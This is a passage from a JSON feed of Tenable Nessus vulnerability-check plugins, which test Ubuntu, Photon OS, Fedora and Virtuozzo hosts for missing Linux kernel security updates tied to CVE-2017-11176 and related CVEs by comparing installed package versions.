get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2016-8632\", \"CVE-2017-10661\", \"CVE-2017-10662\", \"CVE-2017-10663\", \"CVE-2017-10911\", \"CVE-2017-11176\", \"CVE-2017-14340\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for USN-3470-1\");\n }\n else\n {\n _ubuntu_report = ksplice_reporting_text();\n }\n}\n\nflag = 0;\n\nif (ubuntu_check(osver:\"14.04\", pkgname:\"linux-image-3.13.0-135-generic\", pkgver:\"3.13.0-135.184\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"linux-image-3.13.0-135-generic-lpae\", pkgver:\"3.13.0-135.184\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"linux-image-3.13.0-135-lowlatency\", pkgver:\"3.13.0-135.184\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"linux-image-generic\", pkgver:\"3.13.0.135.144\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"linux-image-generic-lpae\", pkgver:\"3.13.0.135.144\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"linux-image-lowlatency\", pkgver:\"3.13.0.135.144\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux-image-3.13-generic / linux-image-3.13-generic-lpae / etc\");\n}\n", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-02-08T12:48:12", "description": "An update of [linux] packages for PhotonOS has been released.", "edition": 4, "published": "2018-08-17T00:00:00", "title": "Photon OS 1.0: Linux PHSA-2017-0036 (deprecated)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-14340"], "modified": "2019-02-07T00:00:00", "cpe": ["p-cpe:/a:vmware:photonos:linux", "cpe:/o:vmware:photonos:1.0"], "id": "PHOTONOS_PHSA-2017-0036.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=111885", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# @DEPRECATED@\n#\n# Disabled on 2/7/2019\n#\n\n# The descriptive text and package checks in this plugin were\n# extracted from VMware Security Advisory PHSA-2017-0036. The text\n# itself is copyright (C) VMware, Inc.\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(111885);\n script_version(\"1.2\");\n script_cvs_date(\"Date: 2019/02/07 18:59:50\");\n\n script_cve_id(\"CVE-2017-14340\");\n\n script_name(english:\"Photon OS 1.0: Linux PHSA-2017-0036 (deprecated)\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"This plugin has been deprecated.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update of [linux] packages for PhotonOS has been released.\");\n # https://github.com/vmware/photon/wiki/Security-Updates-75\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?f3d1f7e3\");\n script_set_attribute(attribute:\"solution\", value:\"n/a.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-14340\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/10/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/08/17\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:vmware:photonos:linux\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:photonos:1.0\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"PhotonOS Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/PhotonOS/release\", \"Host/PhotonOS/rpm-list\");\n\n exit(0);\n}\n\nexit(0, \"This plugin has been deprecated.\");\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/PhotonOS/release\");\nif (isnull(release) || release !~ \"^VMware Photon\") audit(AUDIT_OS_NOT, \"PhotonOS\");\nif (release !~ \"^VMware Photon (?:Linux|OS) 1\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"PhotonOS 1.0\");\n\nif (!get_kb_item(\"Host/PhotonOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"PhotonOS\", cpu);\n\nflag = 0;\n\npkgs = [\n \"linux-4.4.88-1.ph1\",\n \"linux-api-headers-4.4.88-1.ph1\",\n \"linux-debuginfo-4.4.88-1.ph1\",\n \"linux-dev-4.4.88-1.ph1\",\n \"linux-docs-4.4.88-1.ph1\",\n \"linux-drivers-gpu-4.4.88-1.ph1\",\n \"linux-esx-4.4.88-1.ph1\",\n \"linux-esx-debuginfo-4.4.88-1.ph1\",\n \"linux-esx-devel-4.4.88-1.ph1\",\n \"linux-esx-docs-4.4.88-1.ph1\",\n \"linux-oprofile-4.4.88-1.ph1\",\n \"linux-sound-4.4.88-1.ph1\",\n \"linux-tools-4.4.88-1.ph1\"\n];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"PhotonOS-1.0\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux\");\n}\n", "cvss": {"score": 4.9, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2020-03-17T22:39:21", "description": "An update of the linux package has been released.", "edition": 8, "cvss3": {"score": 5.5, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"}, "published": "2019-02-07T00:00:00", "title": "Photon OS 1.0: Linux PHSA-2017-0036", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-14340"], "modified": "2019-02-07T00:00:00", "cpe": ["p-cpe:/a:vmware:photonos:linux", "cpe:/o:vmware:photonos:1.0"], "id": "PHOTONOS_PHSA-2017-0036_LINUX.NASL", "href": "https://www.tenable.com/plugins/nessus/121734", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\n# The descriptive text and package checks in this plugin were\n# extracted from VMware Security Advisory PHSA-2017-0036. The text\n# itself is copyright (C) VMware, Inc.\n\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(121734);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2019/03/08\");\n\n script_cve_id(\"CVE-2017-14340\");\n\n script_name(english:\"Photon OS 1.0: Linux PHSA-2017-0036\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote PhotonOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update of the linux package has been released.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/vmware/photon/wiki/Security-Updates-75.md\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected Linux packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-14340\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/10/04\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/10/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/02/07\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:vmware:photonos:linux\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:photonos:1.0\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"PhotonOS Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/PhotonOS/release\", \"Host/PhotonOS/rpm-list\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/PhotonOS/release\");\nif (isnull(release) || release !~ \"^VMware Photon\") audit(AUDIT_OS_NOT, \"PhotonOS\");\nif (release !~ \"^VMware Photon (?:Linux|OS) 1\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"PhotonOS 1.0\");\n\nif (!get_kb_item(\"Host/PhotonOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"PhotonOS\", cpu);\n\nflag = 0;\n\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"linux-4.4.88-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"linux-api-headers-4.4.88-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"linux-debuginfo-4.4.88-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"linux-dev-4.4.88-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"linux-docs-4.4.88-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"linux-drivers-gpu-4.4.88-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"linux-esx-4.4.88-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"linux-esx-debuginfo-4.4.88-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"linux-esx-devel-4.4.88-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"linux-esx-docs-4.4.88-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"linux-oprofile-4.4.88-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"linux-sound-4.4.88-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"linux-tools-4.4.88-1.ph1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux\");\n}\n", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-01-07T10:14:10", "description": "The 4.11.11 update contains a number of important fixes across the\ntree\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "edition": 19, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-07-24T00:00:00", "title": "Fedora 26 : kernel (2017-deb70b495e)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-11176"], "modified": "2017-07-24T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:kernel", "cpe:/o:fedoraproject:fedora:26"], "id": "FEDORA_2017-DEB70B495E.NASL", "href": "https://www.tenable.com/plugins/nessus/101923", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2017-deb70b495e.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(101923);\n script_version(\"3.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2017-11176\");\n script_xref(name:\"FEDORA\", value:\"2017-deb70b495e\");\n\n script_name(english:\"Fedora 26 : kernel (2017-deb70b495e)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The 4.11.11 update contains a number of important fixes across the\ntree\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2017-deb70b495e\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected kernel package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:26\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/07/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/07/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/07/24\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\ninclude(\"ksplice.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^26([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 26\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2017-11176\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for FEDORA-2017-deb70b495e\");\n }\n else\n {\n __rpm_report = ksplice_reporting_text();\n }\n}\n\nflag = 0;\nif (rpm_check(release:\"FC26\", reference:\"kernel-4.11.11-300.fc26\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-07T10:12:03", "description": "The 4.11.11 update contains a number of important fixes across the\ntree.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "edition": 19, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-07-24T00:00:00", "title": "Fedora 25 : kernel (2017-98548b066b)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-11176"], "modified": "2017-07-24T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:kernel", "cpe:/o:fedoraproject:fedora:25"], "id": "FEDORA_2017-98548B066B.NASL", "href": "https://www.tenable.com/plugins/nessus/101919", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2017-98548b066b.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(101919);\n script_version(\"3.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2017-11176\");\n script_xref(name:\"FEDORA\", value:\"2017-98548b066b\");\n\n script_name(english:\"Fedora 25 : kernel (2017-98548b066b)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The 4.11.11 update contains a number of important fixes across the\ntree.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2017-98548b066b\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected kernel package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:25\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/07/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/07/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/07/24\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\ninclude(\"ksplice.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^25([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 25\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2017-11176\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for FEDORA-2017-98548b066b\");\n }\n else\n {\n __rpm_report = ksplice_reporting_text();\n }\n}\n\nflag = 0;\nif (rpm_check(release:\"FC25\", reference:\"kernel-4.11.11-200.fc25\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-06T09:13:14", "description": "According to the version of the vzkernel package and the\nreadykernel-patch installed, the Virtuozzo installation on the remote\nhost is affected by the following vulnerabilities :\n\n - The mq_notify function in the Linux kernel through\n 4.11.9 does not set the sock pointer to NULL upon entry\n into the retry logic. During a user-space close of a\n Netlink socket, it allows attackers to cause a denial\n of service (use-after-free) or possibly have\n unspecified other impact.\n\n - If the sctp module was loaded on the host, a privileged\n user inside a container could make sctp listen on a\n socket in an inappropriate state, causing a kernel\n crash (use-after-free in sctp_wait_for_sndbuf()).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Virtuozzo security advisory.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "edition": 34, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-07-20T00:00:00", "title": "Virtuozzo 7 : readykernel-patch (VZA-2017-065)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-11176"], "modified": "2017-07-20T00:00:00", "cpe": ["cpe:/o:virtuozzo:virtuozzo:7", "p-cpe:/a:virtuozzo:virtuozzo:readykernel"], "id": "VIRTUOZZO_VZA-2017-065.NASL", "href": "https://www.tenable.com/plugins/nessus/101822", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(101822);\n script_version(\"3.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\n \"CVE-2017-11176\"\n );\n\n script_name(english:\"Virtuozzo 7 : readykernel-patch (VZA-2017-065)\");\n script_summary(english:\"Checks the readykernel output for the updated patch.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Virtuozzo host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the version of the vzkernel package and the\nreadykernel-patch installed, the Virtuozzo installation on the remote\nhost is affected by the following vulnerabilities :\n\n - The mq_notify function in the Linux kernel through\n 4.11.9 does not set the sock pointer to NULL upon entry\n into the retry logic. During a user-space close of a\n Netlink socket, it allows attackers to cause a denial\n of service (use-after-free) or possibly have\n unspecified other impact.\n\n - If the sctp module was loaded on the host, a privileged\n user inside a container could make sctp listen on a\n socket in an inappropriate state, causing a kernel\n crash (use-after-free in sctp_wait_for_sndbuf()).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Virtuozzo security advisory.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://help.virtuozzo.com/customer/portal/articles/2843880\");\n # https://readykernel.com/patch/Virtuozzo-7/readykernel-patch-15.2-26.1-1.vl7/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?cbea0ac8\");\n # https://readykernel.com/patch/Virtuozzo-7/readykernel-patch-18.7-26.1-1.vl7/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?2c1cc793\");\n # https://readykernel.com/patch/Virtuozzo-7/readykernel-patch-20.18-26.1-1.vl7/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?fb78b449\");\n # https://readykernel.com/patch/Virtuozzo-7/readykernel-patch-30.10-26.1-1.vl7/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?cfca4c65\");\n # https://readykernel.com/patch/Virtuozzo-7/readykernel-patch-30.15-26.1-1.vl7/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?fa78a6ff\");\n script_set_attribute(attribute:\"solution\", value:\"Update the readykernel patch.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/07/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/07/20\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:readykernel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:virtuozzo:virtuozzo:7\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Virtuozzo Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Virtuozzo/release\", \"Host/Virtuozzo/rpm-list\", \"Host/readykernel-info\");\n\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"readykernel.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/Virtuozzo/release\");\nif (isnull(release) || \"Virtuozzo\" >!< release) audit(AUDIT_OS_NOT, 